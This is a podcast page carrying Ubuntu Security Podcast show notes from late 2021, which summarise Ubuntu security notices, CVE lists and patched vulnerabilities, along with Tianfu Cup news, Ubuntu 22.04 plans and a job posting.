      • CVE-2021-35477
      • CVE-2021-34556
      • CVE-2021-3428
      • CVE-2020-36385
      • CVE-2019-19449
    • 5.4 (focal, bionic hwe)

    [USN-5134-1] Docker vulnerability [04:50]

    • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-41092
    • If was using a private registry for docker login but also had configured credsStore and credsHelper in ~/.docker/config.json and these were not able to be executed (ie. execute bit not set or not in $PATH), then creds would get sent to the public docker registry rather than the configured private registry.

    Goings on in Ubuntu Security Community

    Hiring [06:00]

    Security - Product Manager

    • HOME BASED - EMEA (Europe, Middle East, Africa)
    • Role includes:
      • guiding the evolution of security offerings from Canonical and Ubuntu
      • driving compliance and certification of Ubuntu
      • engaging with the open source security community
      • telling the story of Canonical’s work to deliver secure platforms
    • https://canonical.com/careers/2278145/security-product-manager-remote

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 136 Nov 05, 2021
    Show notes

    Overview The road to Ubuntu 22.04 LTS begins so we look at some of its planned features plus we cover security updates for the Linux kernel, Mailman, Apport, PHP, Bind and more. This week in Ubuntu Security Updates 92 unique CVEs addressed [USN-5114-1] Linux kernel vulnerabilities [01:15] 4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS) CVE-2021-42008 CVE-2021-40490 CVE-2021-38198 CVE-2020-3702 4.15 + HWE on ESM Race in ath9k -> could fail to properly encrypt traffic -> info leak KVM shadow pages perms -> local user DoS ext4 race in xattr handling - local DoS / priv-esc 6pack driver validation failure -> DoS / code-exec [USN-5115-1] Linux kernel (OEM) vulnerabilities [02:19] 16 CVEs addressed in Focal (20.04 LTS) CVE-2021-42008 CVE-2021-40490 CVE-2021-38205 CVE-2021-38204 CVE-2021-38166 CVE-2021-3759 CVE-2021-3753 CVE-2021-3743 CVE-2021-3739 CVE-2021-3732 CVE-2021-37159 CVE-2021-3679 CVE-2021-35477 CVE-2021-34556 CVE-2021-33624 CVE-2020-3702 5.10 OEM As above plus various BPF hardening fixes against spectre-like attacks, fixes for security issues in tracing subsystem, overlayfs, btrfs, Qualcomm IPC router, Xilinx ethernet driver info leak [USN-5116-1, USN-5116-2] Linux kernel vulnerabilities [02:55] 6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS) CVE-2021-42008 CVE-2021-40490 CVE-2021-38205 CVE-2021-38198 CVE-2021-3732 CVE-2020-3702 5.4 + KVM + bionic HWE + clouds (AWS, Azure, GCP, GKE, IBM, Oracle + RPi) Race in ath9k -> could fail to properly encrypt traffic -> info leak KVM shadow pages perms -> local user DoS ext4 race in xattr handling - local DoS / priv-esc 6pack driver validation failure -> DoS / code-exec overlayfs + xilinx [USN-5117-1] Linux kernel (OEM) vulnerabilities [03:29] 4 CVEs addressed in Focal (20.04 LTS) CVE-2021-3759 CVE-2021-3753 CVE-2021-3743 CVE-2021-3739 5.13 OEM btrfs, qualcomm IPC, VT IOCTL handling, memory leak in IPC object handling [USN-5120-1] Linux kernel (Azure) vulnerabilities [03:40] 9 CVEs addressed in Focal (20.04 LTS) CVE-2021-40490 CVE-2021-38207 CVE-2021-38199 CVE-2021-3759 CVE-2021-3612 CVE-2021-22543 CVE-2020-36311 CVE-2020-26541 CVE-2019-19449 5.8 Azure [USN-5119-1] libcaca vulnerabilities [03:53] 2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10) CVE-2021-30499 CVE-2021-30498 text mode graphics handling library 2 buffer overflows -> crash / code exec in handling of TGA images and when exporting to troff format [USN-5121-1, USN-5121-2] Mailman vulnerabilities [04:24] 2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), 5 CVEs addressed in Focal (20.04 LTS) CVE-2021-42096 CVE-2021-42097 CVE-2020-12137 (20.04 LTS only) CVE-2020-15011 (20.04 LTS only) CVE-2020-12108 (20.04 LTS only) 2 different CSRF attacks against mailman - in first, failed to properly associate CSRF tokens with accounts - could be used to take over another account In second, CSRF tokens which are generated are derived from the admin password - could then allow a remote attacker to use this to help brute force guess admin pw In both cases need to already be an existing list member and be logged in to mount attacks For focal also included a couple medium priority vulns (don’t affect older versions): Possible arbitrary content injection in 2 different ways which allow content to be provided by an attacker as POST parameters to form handling scripts which will then be incorporated into the page shown to a user So could allow an attacker to say inject a URL to be displayed on a legitimate mailman admin page instance which an unsuspecting user may then follow thinking this is trusted etc. [USN-5122-1, USN-5122-2] Apport vulnerability [05:41] Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10) Could trick Apport into writing core files into arbitrary directories - then these could say be interpreted by other root-level applications to escalate privileges Changed Apport to write core files to known location /var/lib/apport/coredump [USN-5123-1, USN-5123-2] MySQL vulnerabilities [06:25] 43 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10) CVE-2021-35648 CVE-2021-35647 CVE-2021-35646 CVE-2021-35645 CVE-2021-35644 CVE-2021-35643 CVE-2021-35642 CVE-2021-35641 CVE-2021-35640 CVE-2021-35639 CVE-2021-35638 CVE-2021-35637 CVE-2021-35636 CVE-2021-35635 CVE-2021-35634 CVE-2021-35633 CVE-2021-35632 CVE-2021-35631 CVE-2021-35630 CVE-2021-35628 CVE-2021-35627 CVE-2021-35626 CVE-2021-35625 CVE-2021-35624 CVE-2021-35623 CVE-2021-35622 CVE-2021-35613 CVE-2021-35612 CVE-2021-35610 CVE-2021-35608 CVE-2021-35607 CVE-2021-35604 CVE-2021-35602 CVE-2021-35597 CVE-2021-35596 CVE-2021-35591 CVE-2021-35584 CVE-2021-35577 CVE-2021-35575 CVE-2021-35546 CVE-2021-2481 CVE-2021-2479 CVE-2021-2478 8.0.27 in Ubuntu 20.04 LTS, Ubuntu 21.04 and Ubuntu 21.10 5.7.36 in Ubuntu 18.04 LTS, Ubuntu 16.04 ESM https://www.oracle.com/security-alerts/cpuoct2021.html [USN-5124-1] GNU binutils vulnerabilities [06:53] 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS) CVE-2021-3487 CVE-2020-16592 2 issues in libbfd (binary file descriptor) - can be triggered by crafted files UAF in when using hash table impl cause large memory allocation - crash [USN-5009-2] libslirp vulnerabilities [07:30] 6 CVEs addressed in Impish (21.10) CVE-2021-3595 CVE-2021-3594 CVE-2021-3593 CVE-2021-3592 CVE-2020-29130 CVE-2020-29129 Episode 124 [USN-5125-1] PHP vulnerability [07:41] 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10) CVE-2021-21703 Root code exec in PHP-FPM - uses a privileged root level process and unpriv child worker processes but child could access shared memory with parent and cause it to do OOB R/W -> code execution in parent -> priv-esc [USN-5126-1, USN-5126-2] Bind vulnerability [08:33] 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10) CVE-2021-25219 Possible cache poisoning could lead to DoS via excessive entries in the cache causing slow lookup performance [USN-5127-1] WebKitGTK vulnerabilities [08:55] 3 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10) CVE-2021-42762 CVE-2021-30851 CVE-2021-30846 Usual web engine vulns - plus one in the bubblewrap launcher which allows a limited sandbox bypass - could trick host processors into believing a sandboxed process was not and hence could potentially escalate privs [USN-5128-1] Ceph vulnerabilities [09:35] 5 CVEs addressed in Bionic (18.04 LTS), Hirsute (21.04) CVE-2021-3531 CVE-2021-3524 CVE-2021-3509 CVE-2021-20288 CVE-2020-27781 Goings on in Ubuntu Security Community 22.04 LTS development cycle begins [09:46] Will include all the features from the various interim releases since the last 20.04 LTS plus some more Since is an LTS, this cycle is mostly to be spent making things as solid and stable as possible, but a few new features are planned: nftables supported firewalling on Linux has 2 components - kernel-space mechanism and userspace tooling to control that traditionally kernel supported iptables (aka xtables - ip,ip6,arp,eb -tables) nftables as introduced into the kernel in 3.13 as a new mechanism to implement network packet classification and handling - aka firewalling etc kernel has 2 mechanisms then - xtables and nftables userspace then has 2 primary tools for handling these - iptables for xtables and nftables (nft) for nftables iptables userspace added a nft backend so existing iptables rules and users would be switched to that automatically - was already switched to use nft backend in Ubuntu 21.04 now want to support the nftables userspace package for handling nftables as a first class system also look at implementing a nftables backend in ufw so it can drive nftables directly rather than iptables Improvements to OVAL data Improved information around ESM products etc Improved handling of pivot_root in AppArmor Upstream issue https://gitlab.com/apparmor/apparmor/-/issues/113 once a pivot_root occurs, AppArmor loses track of the original paths so if a root level process is granted pivot_root permission, can move around inside it’s own mount namespace to be able to escape outside the AppArmor policy AppArmor needs to track root before and after and allow to specify policy both pre-and-post Hiring [14:46] Security - Product Manager HOME BASED - EMEA (Europe, Middle East, Africa) Role includes: guiding the evolution of security offerings from Canonical and Ubuntu driving compliance and certification of Ubuntu engaging with the open source security community telling the story of Canonical’s work to deliver secure platforms https://canonical.com/careers/2278145/security-product-manager-remote Get in contact security@ubuntu.com #ubuntu-security on the Libera.Chat IRC network ubuntu-hardened mailing list Security section on discourse.ubuntu.com @ubuntu_sec on twitter

    Full show notes at the publisher

    Episode 135 Oct 22, 2021
    Show notes

    Overview

    Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security updates for Linux kernel, nginx, Ardour and strongSwan.

    This week in Ubuntu Security Updates

    24 unique CVEs addressed

    [USN-5091-3] Linux kernel (Azure) regression

    • 6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
      • CVE-2021-38204
      • CVE-2021-38199
      • CVE-2021-38160
      • CVE-2021-37576
      • CVE-2021-3679
      • CVE-2021-33624

    [USN-5092-3] Linux kernel (Azure) regression [00:50]

    • 12 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
      • CVE-2021-38205
      • CVE-2021-38204
      • CVE-2021-38201
      • CVE-2021-38199
      • CVE-2021-38160
      • CVE-2021-37576
      • CVE-2021-37159
      • CVE-2021-3679
      • CVE-2021-35477
      • CVE-2021-34556
      • CVE-2021-33624
      • CVE-2021-41073
    • Failure to boot on large Azure instance types - caused by a patch that got backported to the 5.14 upstream stable kernel that was purported to head off possible future problems, but itself caused issues on say the Standard_D48_v3 instance (48 vCPUs, 192GB RAM, 1.2TB storage) - dropped that patch to resolve the issue

    [USN-5109-1] nginx vulnerability [01:44]

    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
      • CVE-2017-20005
    • Buffer overflow when handling files with modification dates a long time in the past - ie. 1969 or very far in the future - integer overflow in the autoindex module

    [USN-5110-1] Ardour vulnerability [02:22]

    • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
      • CVE-2020-22617
    • UAF in handling of crafted XML files - if using attacker provided files could DoS / RCE

    [USN-5111-1, USN-5111-2] strongSwan vulnerabilities [02:39]

    • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
      • CVE-2021-41991
      • CVE-2021-41990
    • Integer overflow when replacing certs in cache - if can send many requests with different certs can fill cache and then cause replacement of cache entries when gets full - LRU algorithm could then cause integer overflow and hence OOB write as a result
    • Integer overflow in gmp plugin - crafted RSASSA-PSS signature in say a self-signed CA cert sent by an initiation

    [USN-5113-1] Linux kernel vulnerabilities [04:13]

    • 8 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
      • CVE-2021-42008
      • CVE-2021-40490
      • CVE-2021-38166
      • CVE-2021-3753
      • CVE-2021-3743
      • CVE-2021-3739
      • CVE-2021-3732
      • CVE-2020-3702
    • 5.11 hirsute kernel (20.04 HWE)
    • overlayfs perms handling issue, race condition -> OOB read in VT subsystem, integer overflow in hashtable implementation in BPF, ext4 xattrs race -> UAF, ath9k race condition -> info leak

    Goings on in Ubuntu Security Community

    Tianfu Cup 2021 [05:30]

    • https://www.tianfucup.com/en
    • 16-17th October - China’s own Pwn2Own
    • Teams required to use original vulns to hack target platforms - 1.5m USD total reward
    • Targets
      • Docker-CE on Ubuntu 20.04 w generic kernel running a Ubuntu 20.04 desktop container with ssh access as root to the container running unprivileged w/o uidmap, volume mount and default bridge network - 60k USD price
      • Ubuntu 20.04 / Centos 8 running in VMWare Workstation - unprivileged user to escalate to root - 40k USD
      • Ubuntu + qemu-kvm - 20.04 desktop host, running 20.04 server in qemu - VM escape w/o sandbox escape - 60k USD, w/ sandbox escape 150k USD
    • 3 5 minute attempts to run their exploits
    • According to media reports - Ubuntu 20.04 root privesc - 4 times, Docker-CE and qemu VM - once
    • Also iPhone 13 Pro was hacked using a no-interaction RCE attack, plus Google Chrome to get kernel privesc on Windows as well
    • Also according to one media outlet “details unknown but vendors are expected to release patches in coming weeks” - so far no contact / details have been provided to us…
    • Same has happened in previous years - no details get provided to vendors so issues don’t get patched - in the past, exploits which have been showcased at Tianfu have then allegedly gone on to be used in hacking campaigns by the Chinese government
    • Contrast with Pwn2Own - we are invited by organisers to watch and verify attempts in real-time to help judge whether exploits used are actually unique and new, and then ZDI provide details immediately regarding the vulns along with PoCs so we can patch them ASAP

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 134 Oct 15, 2021
    Show notes

    Overview It’s release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more. This week in Ubuntu Security Updates 58 unique CVEs addressed [USN-5095-1] Apache Commons IO vulnerability [00:46] 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS) CVE-2021-29425 Failed to properly sanitize filenames in FileNameUtils.normalize() - should remove relative path components like ../ but if contained leading double-slashes this would fail - and the original path would be returned without alteration - so could then possibly get relative directory traversal to the parent directory depending on how this returned value was used. [USN-5096-1] Linux kernel (OEM) vulnerabilities 16 CVEs addressed in Focal (20.04 LTS) CVE-2021-40490 CVE-2021-38205 CVE-2021-38204 CVE-2021-38203 CVE-2021-38202 CVE-2021-38201 CVE-2021-38199 CVE-2021-38166 CVE-2021-38160 CVE-2021-3732 CVE-2021-37159 CVE-2021-3679 CVE-2021-3612 CVE-2021-35477 CVE-2021-34556 CVE-2021-41073 [USN-5091-2] Linux kernel (Raspberry Pi) vulnerabilities 5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS) CVE-2021-38204 CVE-2021-38199 CVE-2021-38160 CVE-2021-3679 CVE-2021-33624 [USN-5094-2] Linux kernel (Raspberry Pi) vulnerabilities 5 CVEs addressed in Bionic (18.04 LTS) CVE-2021-38205 CVE-2021-38204 CVE-2021-3732 CVE-2021-3679 CVE-2021-22543 [USN-5106-1] Linux kernel (OEM) vulnerabilities [01:36] 6 CVEs addressed in Focal (20.04 LTS) CVE-2021-38199 CVE-2021-38160 CVE-2021-3612 CVE-2021-22543 CVE-2020-26541 CVE-2021-41073 io_uring (5.1) - unprivileged user - trigger free of other kernel memory - code execution Episode 133 [USN-4973-2] Python vulnerability [02:18] 1 CVEs addressed in Focal (20.04 LTS) CVE-2021-29921 ipaddress with octal encoded numbers vuln previously fixed but the patch with this fix got dropped in an intervening SRU where 3.8.10 got backported to 20.04 (LP: #1928057) [USN-5099-1] Imlib2 vulnerability [03:11] 1 CVEs addressed in Focal (20.04 LTS) CVE-2020-12761 integer overflow -> OOB read - ICO file with an excessive amount of colors declared in its color map - fixed to error out in this case [USN-5100-1] containerd vulnerability [03:43] 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04) CVE-2021-41103 container bundles root dirs and plugins had excessive permissions - allows an unprivileged Linux user to traverse directory contents and execute programs in these dirs. If a container image was created with setuid executables then that user on the Linux host could execute these setuid binaries and gain root privileges on the host. [USN-5101-1] MongoDB vulnerability [04:34] 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS) CVE-2019-20925 Unauthenticated client can send crafted messages to the server which specify a negative size when decompressed - an insufficient amount of memory would then get allocated and lead to a possible OOB write Thanks to Heather Lemon from Sustaining Engineering team for preparing this update [USN-5102-1] Mercurial vulnerabilities [05:10] 2 CVEs addressed in Bionic (18.04 LTS) CVE-2018-17983 CVE-2019-3902 Mishandled symlinks in subrepos - defeats usual path-checking logic and so could could allow an attacker to write arbitrary files to the victim’s filesystem outside the repo OOB read when parsing malformed manifest entries [USN-5097-1] LedgerSMB vulnerabilities 3 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04) CVE-2021-3731 CVE-2021-3694 CVE-2021-3693 [USN-5098-1] bl vulnerability 1 CVEs addressed in Bionic (18.04 LTS) CVE-2020-8244 [USN-5103-1] docker.io vulnerability 1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04) CVE-2021-41089 docker cp - could craft a container image that would result in docker cp making changes to existing files on the host filesystem - doesn’t actually allow to read/modify or execute files on the host but could make them readable/change perms etc and expose info on the host [USN-5104-1] Squid vulnerability 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04) CVE-2021-28116 [USN-5105-1] Bottle vulnerability 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS) CVE-2020-28473 [USN-5022-3] MySQL vulnerabilities 16 CVEs addressed in Xenial ESM (16.04 ESM) CVE-2021-2390 CVE-2021-2389 CVE-2021-2385 CVE-2021-2372 CVE-2021-2342 CVE-2021-2307 CVE-2021-2226 CVE-2021-2194 CVE-2021-2180 CVE-2021-2179 CVE-2021-2171 CVE-2021-2169 CVE-2021-2166 CVE-2021-2162 CVE-2021-2154 CVE-2021-2146 [USN-5107-1] Firefox vulnerabilities [06:47] 7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04) CVE-2021-38501 CVE-2021-38500 CVE-2021-38499 CVE-2021-38498 CVE-2021-38497 CVE-2021-38496 CVE-2021-32810 93.0 - usual web issues - “if a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof another origin, or execute arbitrary code.” [USN-5108-1] libntlm vulnerability [07:32] 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS) CVE-2019-17455 stack buffer OOB read when handling a crafted NTLM request since used a fixed size buffer in various functions - fixed to truncate size to fit within the buffer if too big to avoid overflowing the buffer [USN-5078-3] Squashfs-Tools vulnerability [07:54] 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04) CVE-2021-41072 Original backport of patch contained an error and so failed to work for squashfs 2.x filesystems - would fail to actually sort entries as expected - thanks to Salvatore Bonaccorso from the Debian security team for bringing this to our attention Goings on in Ubuntu Security Community Ubuntu 21.10 (Impish Indri) released [09:08] https://ubuntu.com/blog/ubuntu-21-10-has-landed 5.13 kernel KFENCE memory error detector Stack offset randomisation across system-calls Landlock LSM Disabled unprivileged BPF GCC 11 Hiring [13:12] Security Product Manager https://canonical.com/careers/2278145/security-product-manager-remote Get in contact security@ubuntu.com #ubuntu-security on the Libera.Chat IRC network ubuntu-hardened mailing list Security section on discourse.ubuntu.com @ubuntu_sec on twitter

    Full show notes at the publisher

    Previous 1 9 10 11 12 13 25 Next

    Related Podcasts

    Reply All

    1

    Reply All Games & Hobbies
    Inside VR & AR

    2

    Inside VR & AR Gadgets
    Note to Self

    3

    Note to Self News
    BrainStuff

    4

    BrainStuff Natural Sciences
    This Week in Tech (Audio)

    5

    This Week in Tech (Audio) News
    Hands-On Tech (Audio)

    6

    Hands-On Tech (Audio) Technology
    footer-logo

    Contact Us

    Toll Free: 844-670-7747

    Links

    • Home
    • Top Charts
    • Networks
    • Apps
    • Independents Podcasts
    • Podcast Advertising
    • Podcast News
    • Contact Us
    • About Us
    • Analytics & Insights

    Stay Connected

      Privacy, Terms of Use & Our Code of Ethics Protecting Content Creators Copyrights